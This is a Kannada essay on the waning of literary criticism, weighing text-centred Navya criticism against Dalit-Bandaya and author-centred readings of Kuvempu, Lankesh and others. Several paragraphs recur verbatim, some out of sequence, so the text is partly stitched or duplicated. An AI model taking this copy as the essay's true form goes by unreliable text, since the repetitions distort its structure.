ಅಳಿವಿನಂಚಿಗೆ ಸರಿಯುತ್ತಿರುವ ವಿಮರ್ಶೆ

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎನ್ನುವುದು ಜಾತಿ, ಧರ್ಮ, ಸೈದ್ಧಾಂತಿಕ ಧೋರಣೆಗಳ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಪ್ರಬಲವಾದ ಸಂಸ್ಕೃತಿಕ ರಾಜಕಾರಣಗಳನ್ನು ಮಾಡುತ್ತಿರುತ್ತದೆ. ಅದು ಸ್ವಜನಪಕ್ಷಪಾತ ಮತ್ತು ಗುಂಪುಗಾರಿಕೆಗಳಿಂದಲೂ ಮುಕ್ತವಾಗಿಲ್ಲ.

ಕನ್ನಡದಲ್ಲಿ ಸದ್ಯಕ್ಕೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎನ್ನುವುದು ಅಳಿವಿನ ಅಂಚಿಗೆ ಸರಿಯುತ್ತಿದೆ ಎಂಬ ಆತಂಕ ವ್ಯಕ್ತವಾಗುತ್ತಿದೆ. ವಿದ್ವತ್‍ಪೂರ್ಣವಾದ ಗಂಭೀರ ವಿಮರ್ಶೆಯ ಕಾಲವಂತೂ ಮುಗಿದೇಹೋಗಿದೆ ಎನ್ನುವಂತಾಗಿದೆ. ಹೊಸ ತಲೆಮಾರು ವಿಮರ್ಶಾ ಬರವಣಿಗೆಯಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುತ್ತಿರುವುದು ತೀರಾ ಕಡಿಮೆಯಾಗಿದೆ. ಆದ್ದರಿಂದ ಸಾಹಿತ್ಯದ ಬೇರೆ ಪ್ರಕಾರಗಳಿಗೆ ಹೋಲಿಸಿದರೆ ವಿಮರ್ಶಾಲೋಕ ಸೊರಗುತ್ತಿರುವುದು ನಿಜ. ಕನ್ನಡದ ಕೆಲವು ಮಾಸಿಕಗಳು ಮತ್ತು ದಿನಪತ್ರಿಕೆಗಳ ಸಾಪ್ತಾಹಿಕ ಪುರವಣಿಗಳಲ್ಲಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತಿರುವ ಪುಸ್ತಕ ಪರಿಚಯಗಳನ್ನೇ ಈಗ ವಿಮರ್ಶೆ ಎನ್ನುವಂತಾಗಿದೆ. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗೆ ಒದಗಿರುವ ಇಂತಹ ಚಿಂತಾಜನಕ ಪರಿಸ್ಥಿತಿಯ ಸಂದರ್ಭದಲ್ಲಿ ವಿಮರ್ಶೆಯ ಸ್ವರೂಪವನ್ನು ಕುರಿತು ಪುನರ್ ಅವಲೋಕಿಸುವ ಅಗತ್ಯವಿದೆ.

ಕಾಲದಿಂದ ಕಾಲಕ್ಕೆ ಸೃಜನಶೀಲ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ವಿಶ್ಲೇಷಿಸುವ ವಿಧಾನಗಳು ಬದಲಾಗುತ್ತಿರುತ್ತವೆ. ಆದರೆ ಅತ್ಯುತ್ತಮ ಸಾಹಿತ್ಯ ಕೃತಿಗಳು ರಚನೆಯಾದ ಕಾಲವನ್ನು ಮೀರಿ ಅವು ಓದಲ್ಪಡುವ ಕಾಲದಲ್ಲೂ ಪ್ರಸ್ತುತವಾಗುವ ಸಂಗತಿಗಳನ್ನು ತಮ್ಮೊಳಗೆ ಇಟ್ಟುಕೊಂಡಿರುತ್ತವೆ. ಆದ್ದರಿಂದ ಅವು ಬೇರೆಬೇರೆ ಕಾಲಘಟ್ಟಗಳಲ್ಲಿ ವಿಭಿನ್ನವಾಗಿಯೇ ಓದಲು ಪ್ರೇರೇಪಿಸುತ್ತವೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಲೇಖಕನೊಬ್ಬನ ಬೇರೆ ಕೃತಿಗಳನ್ನು ಮತ್ತು ಸಾರ್ವಜನಿಕ ಧೋರಣೆಗಳನ್ನು ಬದಿಗಿಟ್ಟು ಕೇವಲ ಕೃತಿ ಕೇಂದ್ರಿತ ವಿಮರ್ಶೆ ಮಾಡಬೇಕೆ? ಎಂಬ ಪ್ರಶ್ನೆಯನ್ನು ಪರಿಶೀಲಿಸಬಹುದಾಗಿದೆ. ನವ್ಯ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಪ್ರವರ್ಧಮಾನಕ್ಕೆ ಬಂದ ಪಠ್ಯ ಕೇಂದ್ರಿತ ವಿಮರ್ಶಾ ವಿಧಾನವು ಸಾಹಿತ್ಯ ಕೃತಿಯ ಸಂರಚನೆ ಮತ್ತು ಕಲಾತ್ಮಕತೆಯ ಸಂಗತಿಗಳಿಗೆ ಹೆಚ್ಚು ಒತ್ತನ್ನು ನೀಡಿತ್ತು. ಅದಕ್ಕೆ ಯಾವುದೇ ಬಗೆಯ ಸಾಮಾಜಿಕ ಬಿಕ್ಕಟ್ಟುಗಳ ಪ್ರಶ್ನೆಗಳು ಮುಖ್ಯವಾಗಿರಲಿಲ್ಲ. ಈ ವಿಮರ್ಶೆ ಪಠ್ಯದಾಚೆಗಿನ ಲೋಕವನ್ನು ಗಣನೆಗೆ ತೆಗೆದುಕೊಂಡಿರಲಿಲ್ಲ.

ದೇವಯ್ಯ ಹರವೆಯವರ ‘ಶೂದ್ರಶಾಹಿಯಿಂದ ಪುರೋಹಿತ ಶಾಹಿಯೆಡೆಗೆ’ ವಿಮರ್ಶಾ ಲೇಖನವು ಕುವೆಂಪು ಅವರು ತಮ್ಮ ಆತ್ಮಕತೆ ಮತ್ತು ಕಾದಂಬರಿಗಳಲ್ಲಿ ವೈದಿಕ ಆಚರಣೆಗಳಲ್ಲಿ ಗಾಢ ನಂಬಿಕೆಯುಳ್ಳವರು ಎಂಬುದನ್ನು ರುಜುಗೊಳಿಸುತ್ತವೆ; ಅದೇ ಸಂದರ್ಭದಲ್ಲಿ ಸಾರ್ವಜನಿಕ ಭಾಷಣಗಳಲ್ಲಿ ಪುರೋಹಿಶಾಹಿಯ ವಿರುದ್ಧ ಬಂಡೇಳುವುದರ ವೈರುಧ್ಯಗಳನ್ನು ವಿಮರ್ಶಾತ್ಮಕವಾಗಿ ಗುರುತಿಸುತ್ತಾರೆ.

ನವ್ಯ ಕಾಲದ ಎಂ.ಜಿ.ಕೃಷ್ಣಮೂರ್ತಿಯವರ ವಿಮರ್ಶೆಯು ಕುವೆಂಪು ಕಾದಂಬರಿಗಳನ್ನು ‘ಕೇಂದ್ರ’ವೇ ಇಲ್ಲದಿರುವ ಅಸಂಖ್ಯಾತ ವಿವರಗಳಿಂದ  ಕೂಡಿರುವುದರಿಂದ ಅವುಗಳ ಬಂಧವು ಸಡಿಲವಾಗಿದೆ ಎಂದು ಚರ್ಚಿಸಿತ್ತು. ಅನಂತಮೂರ್ತಿಯವರು ಕೂಡ ಇದೇ ಅಭಿಪ್ರಾಯವನ್ನು ಸಮರ್ಥಿಸಿ ‘ಕುವೆಂಪು ಕಾದಂಬರಿಗಳು ವಿವರಗಳಲ್ಲಿ ಸೊಕ್ಕಿವೆ’ ಎಂದೇ ತೀರ್ಮಾನಿಸಿದ್ದರು. ಆದರೆ ದಲಿತ ಬಂಡಾಯ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಇದೇ ಕೃತಿಗಳು ಸಂಘರ್ಷ ಮತ್ತು ವೈರುಧ್ಯಗಳಿಂದ ಕೂಡಿದ ಸಾಮಾಜಿಕ ದೃಷ್ಟಿಕೋನದಿಂದ ನೋಡುವಂತೆ ಮಾಡಿದವು. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎನ್ನುವುದು ಪಠ್ಯದಾಚೆಗೆ ಜಿಗಿದು ಸಮಕಾಲೀನ ಬಿಕ್ಕಟ್ಟುಗಳ ಮೂಲಕ ಲೇಖಕ ಮತ್ತು ಸೃಜನಶೀಲ ಪಠ್ಯಗಳನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ವಿವೇಚಿಸುವಂತೆ ಮಾಡಿತು.

ದಲಿತ ಬಂಡಾಯ ಚಳವಳಿಯ ಸಂದರ್ಭದಲ್ಲಿ ಲೇಖಕರ ಸಾಮಾಜಿಕ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ನಿಲುವುಗಳ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಅವರ ಒಟ್ಟಾರೆ ಸಾಹಿತ್ಯದ ಗ್ರಹೀತಗಳನ್ನು ಗುರುತಿಸುವ ವಿರಳ ಪ್ರಯತ್ನಗಳು ನಡೆದವು. ದೇವಯ್ಯ ಹರವೆ ಮತ್ತು ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರು ಕುವೆಂಪು ಅವರನ್ನು, ಅವರ ಸಾಹಿತ್ಯ ಕೃತಿಗಳೊಂದಿಗೆ ತಳುಕು ಹಾಕಿಕೊಂಡು ಬರೆದ ವಿಮರ್ಶಾ ಮಾದರಿಯೂ ಇದೆ. ದೇವಯ್ಯ ಹರವೆಯವರ ‘ಶೂದ್ರಶಾಹಿಯಿಂದ ಪುರೋಹಿತಶಾಹಿಯೆಡೆಗೆ’ ವಿಮರ್ಶಾ ಲೇಖನವು ಕುವೆಂಪು ಅವರು ತಮ್ಮ ಆತ್ಮಕತೆ ಮತ್ತು ಕಾದಂಬರಿಗಳಲ್ಲಿ ವೈದಿಕ ಆಚರಣೆಗಳಲ್ಲಿ ಗಾಢ ನಂಬಿಕೆಯುಳ್ಳವರು ಎಂಬುದನ್ನು ರುಜುಗೊಳಿಸುತ್ತವೆ; ಅದೇ ಸಂದರ್ಭದಲ್ಲಿ ಸಾರ್ವಜನಿಕ ಭಾಷಣಗಳಲ್ಲಿ ಪುರೋಹಿಶಾಹಿಯ ವಿರುದ್ಧ ಬಂಡೇಳುವುದರ ವೈರುಧ್ಯಗಳನ್ನು ವಿಮರ್ಶಾತ್ಮಕವಾಗಿ ಗುರುತಿಸುತ್ತಾರೆ. ಕರ್ನಾಟಕದಲ್ಲಿ ದಲಿತ ಚಳವಳಿಯ ಮುಖಂಡರಾಗಿದ್ದ ಬಿ.ಕೃಷ್ಣಪ್ಪನವರು ‘ಕುವೆಂಪು ಕಾದಂಬರಿಗಳಲ್ಲಿ ದಲಿತ ಜೀವನ ಚಿತ್ರಣ’ ವಿಮರ್ಶಾ ಲೇಖನದಲ್ಲಿ ಕುವೆಂಪು ಶೂದ್ರ ಮತ್ತು ದಲಿತ ಪಾತ್ರಗಳನ್ನು ತಾರತಮ್ಯದಿಂದ ಚಿತ್ರಿಸಿದರು; ಅವರು ಶೂದ್ರರನ್ನು ತುಳಿಯುವ ಬ್ರಾಹ್ಮಣಶಾಹಿಯನ್ನು ಪ್ರತಿರೋಧಿಸಿದಷ್ಟು ತೀವ್ರವಾಗಿ ಅದೇ ದಲಿತರನ್ನು ತುಳಿಯುವ ಶೂದ್ರಶಾಹಿಯನ್ನು ಪ್ರತಿಭಟಿಸಲಿಲ್ಲವೆಂಬ ನಿಲುವು  ತಾಳುತ್ತಾರೆ. ದೇವಯ್ಯ ಹರವೆ ಮತ್ತು ಬಿ.ಕೃಷ್ಣಪ್ಪ, ಇವರು ತಾವು ಪ್ರತಿನಿಧಿಸುವ ದಲಿತ ಸಮುದಾಯಗಳ ಶೋಷಿತ ನೆಲೆಗಟ್ಟಿನಿಂದ ನೋಡಿದ ವಿಮರ್ಶಾ ಮಾದರಿಗಳು ನಮ್ಮ ಕಣ್ಮುಂದೆ ಇವೆ. ಇವರಿಬ್ಬರು ಕುವೆಂಪು ಮತ್ತು ಅವರ ಸಾಹಿತ್ಯವನ್ನು ತಮ್ಮ ಕಾಲದ ವಿಮರ್ಶಕರಿಗಿಂತ ಭಿನ್ನವಾಗಿ ಗ್ರಹಿಸಿದರು.

ನಟ ರಾಜ್ ಹುಳಿಯಾರ್ ಅವರ ಲಂಕೇಶ್ ಮತ್ತು ಡಿ.ಆರ್.ನಾಗರಾಜ್ ಕೇಂದ್ರಿತ ‘ಇಂತಿ ನಮಸ್ಕಾರಗಳು’ ವಿಮರ್ಶಾ ಕೃತಿಯು ಒಂದು ಹೊಸ ಪ್ರಯೋಗವೇ ಆಗಿದೆ. ಇವರಿಬ್ಬರ ಸಾರ್ಜಜನಿಕ ಬದುಕು, ಆ ಕಾಲದ ರಾಜಕೀಯ, ಸಾಮಾಜಿಕ, ಸಾಂಸ್ಕೃತಿಕ ಧೋರಣೆ ಮತ್ತು ಚಿಂತನೆಗಳನ್ನು ಅವರ ಸಾಹಿತ್ಯದೊಂದಿಗೆ ಸಂಕರಗೊಳಿಸಿ ವಿಮರ್ಶಿಸಿದ್ದು ಕನ್ನಡ ವಿಮರ್ಶೆಯಲ್ಲಿ ಹೊಸ ಮಾದರಿಯಾಗಿದೆ.

ನವ್ಯದವರ ಕೃತಿ ಕೇಂದ್ರಿತ ವಿಮರ್ಶೆಗೆ ಪರ್ಯಾಯವಾಗಿ ಕೃತಿ ಕೇಂದ್ರಿತವಲ್ಲದ ಸಾಮಾಜಿಕ ಪ್ರಶ್ನೆಗಳ ಮತ್ತು ದಲಿತ ಅಸ್ಮಿತೆಯ ಅಂಗವಾಗಿ ಸಾಹಿತ್ಯವು ಮುನ್ನೆಲೆಗೆ ತರುವ ನಿಲುವುಗಳ ಸಾಂಸ್ಕೃತಿಕ ರಾಜಕಾರಣಗಳನ್ನು ವಿಶ್ಲೇಷಿಸಿದರು. ಇಂತಹ ನಿಲುವುಗಳ ಹಿಂದೆ ಬಸವಲಿಂಗಪ್ಪನವರ ‘ಬೂಸಾ ಸಾಹಿತ್ಯ ಪ್ರಕರಣ’ವೂ ಬೆನ್ನಿಗಿತ್ತು. ಸಾಹಿತ್ಯ ಕೃತಿಯೊಂದನ್ನು ಹಲವು ಆಯಾಮಗಳಿಂದ ನೋಡುವ ಇಂತಹ ಮಾದರಿ ಯಾಕೋ ಈಗ ಅಂಚಿಗೆ ಸರಿದಿದೆ. ಆದರೆ ಇತ್ತೀಚೆಗೆ ರಹಮತ್ ತರೀಕೆರೆ ಅವರು ‘ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಾಗ್ವಾದಗಳು’ ಕೃತಿಯಲ್ಲಿ ಕೃತಿ ಕೇಂದ್ರಿತವಲ್ಲದ ಸಾಮಾಜಿಕ, ಧಾರ್ಮಿಕ. ರಾಜಕೀಯ, ಜಾತಿ ಸಂಘರ್ಷ, ಸಾಂಸ್ಕೃತಿಕ ಪ್ರಶ್ನೆಗಳಂತಹ ಹಲವು ದಿಕ್ಕಿನಿಂದ ಸಾಹಿತ್ಯಕ ಪಠ್ಯಗಳನ್ನು ಒರೆಗೆ ಹಚ್ಚಿ ಚರ್ಚಿಸಿರುವುದು ಗಮನಾರ್ಹ ಸಂಗತಿಯಾಗಿದೆ. ಈ ದಿಕ್ಕಿನಲ್ಲಿ ನಟ ರಾಜ್ ಹುಳಿಯಾರ್ ಅವರ ಲಂಕೇಶ್ ಮತ್ತು ಡಿ.ಆರ್.ನಾಗರಾಜ್ ಕೇಂದ್ರಿತ ‘ಇಂತಿ ನಮಸ್ಕಾರಗಳು’ ವಿಮರ್ಶಾ ಕೃತಿಯು ಒಂದು ಹೊಸ ಪ್ರಯೋಗವೇ ಆಗಿದೆ. ಇವರಿಬ್ಬರ ಸಾರ್ಜಜನಿಕ ಬದುಕು, ಆ ಕಾಲದ ರಾಜಕೀಯ, ಸಾಮಾಜಿಕ, ಸಾಂಸ್ಕೃತಿಕ ಧೋರಣೆ ಮತ್ತು ಚಿಂತನೆಗಳನ್ನು ಅವರ ಸಾಹಿತ್ಯದೊಂದಿಗೆ ಸಂಕರಗೊಳಿಸಿ ವಿಮರ್ಶಿಸಿದ್ದು ಕನ್ನಡ ವಿಮರ್ಶೆಯಲ್ಲಿ ಹೊಸ ಮಾದರಿಯಾಗಿದೆ.

ಯಾವುದೇ ಸಾಹಿತ್ಯಕ ಚರ್ಚೆ ಅಥವಾ ವಿಮರ್ಶಾ ಬರಹಗಳು ಕೇವಲ ಸಾಹಿತ್ಯಕ್ಕಷ್ಟಕ್ಕೆ ಅವು ಸೀಮಿತವಾಗಿರುವುದಿಲ್ಲ. ಸಮಕಾಲೀನ ಸಂದರ್ಭದಲ್ಲಿ ಕಣ್ಣಿಗೆ ರಾಚುವ ಅಸಮಾನತೆ, ಅಸ್ಪಶ್ಯತೆ, ಜಾತಿಭೇದ, ವರ್ಗಭೇದ, ಲಿಂಗ ತಾರತಮ್ಯಗಳಿಂದ ಕೂಡಿದ ವಿದ್ಯಮಾನಗಳು ಸಾಹಿತ್ಯ ಕೃತಿ ಮತ್ತು ಲೇಖಕರ ನಿಲುವುಗಳನ್ನು ಒಟ್ಟಾರೆಯಾಗಿ ನೋಡಲು ಒತ್ತಾಯಿಸುತ್ತವೆ. ಈ ಕಾಲದ ಪ್ರಜಾಪ್ರಭುತ್ವ ಮತ್ತು ರಾಜಕೀಯ ಬಿಕ್ಕಟ್ಟುಗಳು ಕೂಡ ಸಾಹಿತ್ಯ ಕೃತಿಯನ್ನು ಹಲವು ಆಯಾಮಗಳಿಂದ ವಿಮರ್ಶೆಗೆ ಒಳಪಡಿಸುವ  ಒತ್ತಾಸೆಯನ್ನು ಹೇರುತ್ತವೆ. ಎಲ್ಲವೂ ಭ್ರಷ್ಟಗೊಳ್ಳುತ್ತಿರುವ ಇಂದಿನ ಕಾಲಮಾನದಲ್ಲಿ ಲೇಖಕರು ಕೂಡ ಇದರಿಂದ ಹೊರಗಿಲ್ಲ ಎನ್ನುವುದು ಗೊತ್ತಿರುವ ಸಂಗತಿಯೇ ಆಗಿದೆ. ಆದ್ದರಿಂದ ಎಲ್ಲವೂ ವಿಮರ್ಶೆಗೆ ಒಳಪಡುವುದು ಇಂದಿನ ಕಾಲಧರ್ಮವೇ ಆಗಿದೆ.

ಅನೇಕ ವಿಮರ್ಶಕರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಆಶಯವನ್ನು ಚರ್ಚಿಸುವಾಗ ಲೇಖಕರ ಆಶಯಗಳೊಂದಿಗೆ ವಿಶ್ಲೇಷಿಸುವ ಸಾಕಷ್ಟು ನಿದರ್ಶನಗಳಿವೆ. ಆದರೆ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಸಂಕೀರ್ಣವಾದ ಜಗತ್ತನ್ನು ಅತಿಯಾದ ಸರಳೀಕರಣದಿಂದ ಸುಲಭ ತೀರ್ಮಾನಗಳಿಗೆ ತಲುಪುವ ಸಾಧ್ಯತೆಗಳಿರುತ್ತವೆ.

ಸಾಹಿತ್ಯದ ವಿದ್ಯಾರ್ಥಿಗಳು ಸೃಜನಶೀಲ ಸಾಹಿತ್ಯದ ಪಠ್ಯಗಳನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ಗ್ರಹಿಸಬೇಕಾಗುತ್ತದೆ. ಆದರೆ  ಎಷ್ಟೋ ಬಾರಿ ಸಾಹಿತ್ಯ ವಿಮರ್ಶಾ ಲೇಖನಗಳು ಗೊಂದಲದಿಂದ ಕೂಡಿರುತ್ತವೆ. ವಿಮರ್ಶೆಯ ಲೇಖನಗಳು ಸಾಹಿತ್ಯ ಕೃತಿಯೊಳಗೆ ಅದರ ಲೇಖಕನ ನಿಲುವುಗಳನ್ನು ಹುಡುಕಲು ಪ್ರಯತ್ನಿಸಿವೆ. ‘ಚೋಮನದುಡಿ’ ಕಾದಂಬರಿಯಲ್ಲಿ ಕಾರಂತರು ಚೋಮನಿಗೆ ಭೂಮಿಯನ್ನು ಕೊಡಿಸಲಿಲ್ಲ; ಕುವೆಂಪು ತಮ್ಮ ಕಾದಂಬರಿ ಗಳಲ್ಲಿ ದಲಿತರ ಪರವಾಗಿಲ್ಲ ಎನ್ನುವ ನಿಲುವುಗಳು ವ್ಯಕ್ತವಾಗಿವೆ. ಇಂತಹ ಇನ್ನೂ ಅನೇಕ ಸಂಗತಿಗಳ ಬಗ್ಗೆ ಸಾಕಷ್ಟು ಪರ ಮತ್ತು ವಿರೋಧದ ಚರ್ಚೆಗಳಾಗಿವೆ. ಇವು ಮತ್ತೆ ಮತ್ತೆ ಲೇಖಕನಿಷ್ಠ ನಿಲುವುಗಳ ಕಡೆಗೆ ಎಳೆದುಕೊಂಡು ಹೋಗುತ್ತವೆ. ಅನೇಕ ವಿಮರ್ಶಕರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಆಶಯವನ್ನು ಚರ್ಚಿಸುವಾಗ ಲೇಖಕರ ಆಶಯಗಳೊಂದಿಗೆ ವಿಶ್ಲೇಷಿಸುವ ಸಾಕಷ್ಟು ನಿದರ್ಶನಗಳಿವೆ. ಆದರೆ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಸಂಕೀರ್ಣವಾದ ಜಗತ್ತನ್ನು ಅತಿಯಾದ ಸರಳೀಕರಣದಿಂದ ಸುಲಭ ತೀರ್ಮಾನಗಳಿಗೆ ತಲುಪುವ ಸಾಧ್ಯತೆಗಳಿರುತ್ತವೆ. ಹೀಗಾಗಿ ವಿಮರ್ಶೆಯೆಂದರೆ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಲೇಖಕರನ್ನು ಅಪರಾಧಿಯ ಸ್ಥಾನದಲ್ಲಿ, ಕಟಕಟೆಯಲ್ಲಿ ನಿಲ್ಲಿಸಿ ಆಪಾದಿಸುವುದು ಎನ್ನುವಂತಾಗಿದೆ. ಸೃಜನಶೀಲ ಕೃತಿಯನ್ನು ಸಮಾಜಶಾಸ್ತ್ರೀಯ ಸೀಮಿತವಾದ ಚೌಕಟ್ಟಿನಲ್ಲಿ ನೋಡುವುದರಿಂದ ಸಾಹಿತ್ಯ ಪಠ್ಯದ ಅರ್ಥಸಾಧ್ಯತೆಗಳನ್ನು ಸಂಕುಚಿತಗೊಳಿಸುವ ಅಪಾಯಗಳಿವೆ.

ಲೇಖಕರ ವೈಯಕ್ತಿಕ ಜೀವನ ಮತ್ತು ಅವರ ವ್ಯಕ್ತಿತ್ವದ ಅಳತೆಗೋಲಾಗಿ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಓದುವುದು ಕಷ್ಟಸಾಧ್ಯ. ಯಾಕೆಂದರೆ ಆ ಲೇಖಕರು ತಮ್ಮ ಕೃತಿಯೊಳಗಿನ ಜಗತ್ತಿಗೆ ತದ್ವಿರುದ್ಧವಾಗಿಯೇ ಬದುಕಿರುವ ಸಾಧ್ಯತೆಗಳಿರುತ್ತವೆ. ಸಾಹಿತ್ಯ ಕೃತಿಗಳಲ್ಲಿ ಲೇಖಕರ ನಿಲುವುಗಳನ್ನೇ ಕೆದಕುವುದರಿಂದ ಅವುಗಳ ನಿಜವಾದ ಆಶಯಗಳನ್ನು ಮರೆಮಾಚಿದಂತಾಗುತ್ತದೆ. ಸಾಹಿತ್ಯ ಕೃತಿಯೊಂದಕ್ಕೆ ನಿರೂಪಕರು ಇರುತ್ತಾರೆ. ಆತ್ಮಕಥಾನಕ ನಿರೂಪಣೆಯನ್ನು ಹೊಂದಿರುವ ಕೃತಿಗಳನ್ನು ಕೂಡ ಲೇಖಕರೇ ಮಾತನಾಡುತ್ತಿರುವುದು ಎಂದು ತಿಳಿಯಲಾಗುತ್ತದೆ. ಕನ್ನಡದಲ್ಲಿ ಪೂರ್ಣಚಂದ್ರ ತೇಜಸ್ವಿಯವರ ಕತೆ ಕಾದಂಬರಿಗಳನ್ನು ಈ ನೆಲೆಯಿಂದ ಗ್ರಹಿಸಲಾಗಿದೆ. ಆದರೆ ಲೇಖಕ ಮತ್ತು ಕಥನದ ನಿರೂಪಕ-ಇವರಿಬ್ಬರೂ ಒಂದೇ ಎಂದು ಗ್ರಹಿಸುವುದರಿಂದ ಕೃತಿಯನ್ನು ಭಿನ್ನವಾದ ದೃಷ್ಟಿಕೋನಗಳಿಂದ ಗಮನಿಸಲಾಗುವುದಿಲ್ಲ.

ಇಂತಹ ಅನೇಕ ಬುದ್ಧಿಜೀವಿ ಲೇಖಕರ ಬಗ್ಗೆ ಲಂಕೇಶ್ ಅವರು ತಮ್ಮ ಪತ್ರಿಕೆಯಲ್ಲಿ ವಿಶ್ಲೇಷಿಸುತ್ತಿದ್ದರು. ಸಾರ್ವಜನಿಕ ವ್ಯಕ್ತಿತ್ವವನ್ನು ಪಡೆದಿದ್ದ ಮಾಸ್ತಿ, ಡಿವಿಜಿ, ಕುವೆಂಪು, ಕಾರಂತ, ಬೇಂದ್ರೆ, ಅನಂತಮೂರ್ತಿ, ಕಾರ್ನಾಡ ಮೊದಲಾದವರ ಬಗ್ಗೆ ಲಂಕೇಶ್ ಅವರು ಬರೆದ ಲೇಖನಗಳೇ ಇದಕ್ಕೆ ನಿದರ್ಶನಗಳಾಗಿವೆ.

ಇನ್ನು ಸಾರ್ವಜನಿಕವಾಗಿ ವ್ಯಕ್ತವಾಗುವ ಲೇಖಕರ ಹೇಳಿಕೆಗಳು ಮತ್ತು ನಿಲುವುಗಳನ್ನು ಗ್ರಹಿಸುವ ವಿಧಾನ ಯಾವುದು? ಅವು ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟವಾಗುವ ಹೊತ್ತಿಗೆ ಆ ಅಭಿಪ್ರಾಯಗಳ ಪ್ರಾಮಾಣಿಕತೆ, ಸತ್ಯಾಸತ್ಯತೆ ಮತ್ತು ವಿಶ್ವಾಸಾರ್ಹತೆಗಳೇ ಮಾಯವಾಗಿ ಕೇವಲ ವಿವಾದಾತ್ಮಕ  ಹೇಳಿಕೆಗಳಾಗಿ ಮಾರ್ಪಟ್ಟಿರುತ್ತವೆ. ಕನ್ನಡ ನಾಡಿನ ಸಾಮಾಜಿಕ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ಬಿಕ್ಕಟ್ಟುಗಳ ಸಂದರ್ಭದಲ್ಲಿ ಕೆಲವು ಲೇಖಕರು ಸಾರ್ವಜನಿಕವಾಗಿ ಸ್ಪಂದಿಸಿದ್ದಾರೆ. ಇಂತಹ ಅನೇಕ ಬುದ್ಧಿಜೀವಿ ಲೇಖಕರ ಬಗ್ಗೆ ಲಂಕೇಶ್ ಅವರು ತಮ್ಮ ಪತ್ರಿಕೆಯಲ್ಲಿ ವಿಶ್ಲೇಷಿಸುತ್ತಿದ್ದರು. ಸಾರ್ವಜನಿಕ ವ್ಯಕ್ತಿತ್ವವನ್ನು ಪಡೆದಿದ್ದ ಮಾಸ್ತಿ, ಡಿವಿಜಿ, ಕುವೆಂಪು, ಕಾರಂತ, ಬೇಂದ್ರೆ, ಅನಂತಮೂರ್ತಿ, ಕಾರ್ನಾಡ ಮೊದಲಾದವರ ಬಗ್ಗೆ ಲಂಕೇಶ್ ಅವರು ಬರೆದ ಲೇಖನಗಳೇ ಇದಕ್ಕೆ ನಿದರ್ಶನಗಳಾಗಿವೆ.

  ಚಂಪಾ ಅವರು ಕೂಡ ತಮ್ಮ ಪತ್ರಿಕೆಯಲ್ಲಿ ಈ ಕೆಲಸವನ್ನು ಮಾಡುತ್ತಿದ್ದರು; ಚಂಪಾ ಅವರು ವ್ಯಂಗ್ಯ ಮತ್ತು ವಿಡಂಬನಾತ್ಮಕ ಭಾಷೆಯಲ್ಲಿ ಬರೆಯುತ್ತಿದ್ದರು. ಈ ಮಾದರಿಯ ಬರಹಗಳು ಲೇಖಕರ ಸಾಹಿತ್ಯಕ್ಕಿಂತ ವೈಯಕ್ತಿಕ ಬದುಕಿನ ಸಂಗತಿಗಳನ್ನು ಚರ್ಚಿಸುತ್ತಿದ್ದವು. ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಸಾಮಾಜಿಕ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ಅಂಶಗಳ ತಾತ್ವಿಕ ವಿಶ್ಲೇಷಣೆಯ ಕಡೆಗೆ ಅಷ್ಟೊಂದು ಗಮನ ಕೊಡದೆ ವ್ಯಕ್ತಿನಿಷ್ಠವಾಗಿದ್ದವು. ಇಂತಹ ವಿಮರ್ಶೆಗಳು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಆಶಯ ಕೇಂದ್ರಿತವಾಗದೆ ಲೇಖಕನಿಷ್ಠವಾಗಿದ್ದವು. ಸಾಹಿತ್ಯಕ್ಕಿಂತ ಲೇಖಕರೇ ಹೆಚ್ಚು ಪ್ರಾಧಾನ್ಯ ಪಡೆಯುವಂತೆ ಮಾಡಲಾಯಿತು.

ಓದುಗರ, ವಿಮರ್ಶಕರ ಗಂಭೀರ ಅನುಸಂಧಾನ ನಡೆಯಬೇಕಿರುವುದು ಸಾಹಿತ್ಯ ಕೃತಿಯ ಲೋಕದೊಂದಿಗೆ ಎನ್ನುವ ಎಚ್ಚರಿಕೆಯ ಪ್ರಜ್ಞೆಯಿರಬೇಕಾಗುತ್ತದೆ. ವಿಮರ್ಶಕರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಅನುಸಂಧಾನದ ಮುಖಾಂತರವೇ ಅವು ತೆರೆದಿಡುವ, ಮರೆಮಾಚುವ, ಮುನ್ನೆಲೆಗೆ ತರುವ ಹತ್ತು ಹಲವು ಸಂಗತಿಗಳನ್ನು ಚರ್ಚಿಸಬೇಕಾಗುತ್ತದೆ. ಅವು ಸಾಹಿತ್ಯ ಕೃತಿಯಲ್ಲಿ ಸೃಷ್ಟಿಯಾದ ಪಾತ್ರಗಳ ನಿಲುವುಗಳಾಗಿರುತ್ತವೆ; ಅವು ಕೂಡ ಆಯಾ ಸಂದರ್ಭಗಳಿಗೆ ಬದ್ಧವಾಗಿರುತ್ತವೆ. ಅವು ಕೃತಿಯ ಲೇಖಕರ ನಿಲುವುಗಳಾಗಿರುವುದಿಲ್ಲ. 